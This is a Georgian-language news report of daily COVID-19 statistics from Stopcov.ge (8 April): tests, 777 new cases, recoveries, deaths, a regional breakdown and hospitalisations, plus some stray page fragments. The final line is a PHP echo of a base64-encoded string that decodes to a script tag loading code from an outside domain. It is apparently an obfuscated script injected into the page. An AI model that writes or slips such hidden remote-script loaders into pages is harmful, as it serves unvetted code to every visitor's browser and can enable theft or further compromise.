celsiusi
ავერსი შნაიდერი
Stopcov.ge-ზე გამოქვეყნებული ინფორმაციის თანახმად, ინტენსიური ტესტირების ფარგლებში, ბოლო 24 საათში ქვეყნის მასშტაბით ჩატარდა 36 578 კვლევა ტესტით, მათ შორის 24 438 კვლევა ანტიგენის ტესტით და 12 140 PCR ტესტით.
 
ჩატარებული ტესტირების შედეგად, ბოლო 24 საათში გამოვლინდა ვირუსით ინფიცირების 777 ახალი  შემთხვევა და პანდემიის გავრცელებიდან დღემდე გამოვლენილი დადასტურებული შემთხვევების საერთო რაოდენობა 287 183-მდე გაიზარდა. 
 
რაც შეეხება დადებითობის მაჩვენებელს, 8 აპრილის მდგომარეობით, დადებითობის დღიური მაჩვენებელი არის 2.12 %, ბოლო 14 დღის მანძილზე - 2.09%, ხოლო 7 დღის მანძილზე - 2.47 %.
 
ბოლო 24 საათში ვირუსისგან გამოჯანმრთელდა 342 პირი და ჯამში გამოჯანმრთელებულთა რაოდენობა გაიზარდა - 276 426-მდე.
 
ბოლო 24 საათში კორონავირუსით გარდაცვალების 9 ახალი შემთხვევა დაფიქსირდა. პანდემიის გავრცელებიდან დღემდე ვირუსს ჯამში 3 858 პირი ემსხვერპლა.
 
დღეს ქვეყანაში გამოვლენილი ინფიცირების 777 ახალი შემთხვევიდან: თბილისში გამოვლენილია 430 შემთხვევა, დანარჩენი კი რაიონებზე გადანაწილდა: აჭარა - 62, იმერეთი - 50, ქვემო ქართლი - 29, შიდა ქართლი - 29, გურია - 21, სამეგრელო - ზემო სვანეთი - 91, კახეთი - 32, მცხეთა-მთიანეთი - 17, სამცხე-ჯავახეთი - 6, რაჭა-ლეჩხუმი და ქვემო სვანეთი - 10.
 
ამ ეტაპზე ინფიცირების სულ ვირუსით ინფიცირებულების რაოდენობა შეადგენს 6 873 ადამიანს, საიდანაც: 2 129 ადამიანი მკურნალობს საავადმყოფოში,ხელოვნური სუნთქვის აპარატზე იმყოფება 68 პირი, 4 459 პირი ვირუსის მკურნალობის კურსს გადის საცხოვრებელ ბინაზე. საკარანტინე სივრცეებში მოთავსებულია 233 ადამიანი.
 
სახელმწიფო საზღვრიდან საკარანტინე სივრცეებში გადაყვანილია - 24 140 პირი. ამ ეტაპისთვის თვითიზოლაციაში იმყოფება 11 879 ადამიანი.
 
1243
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");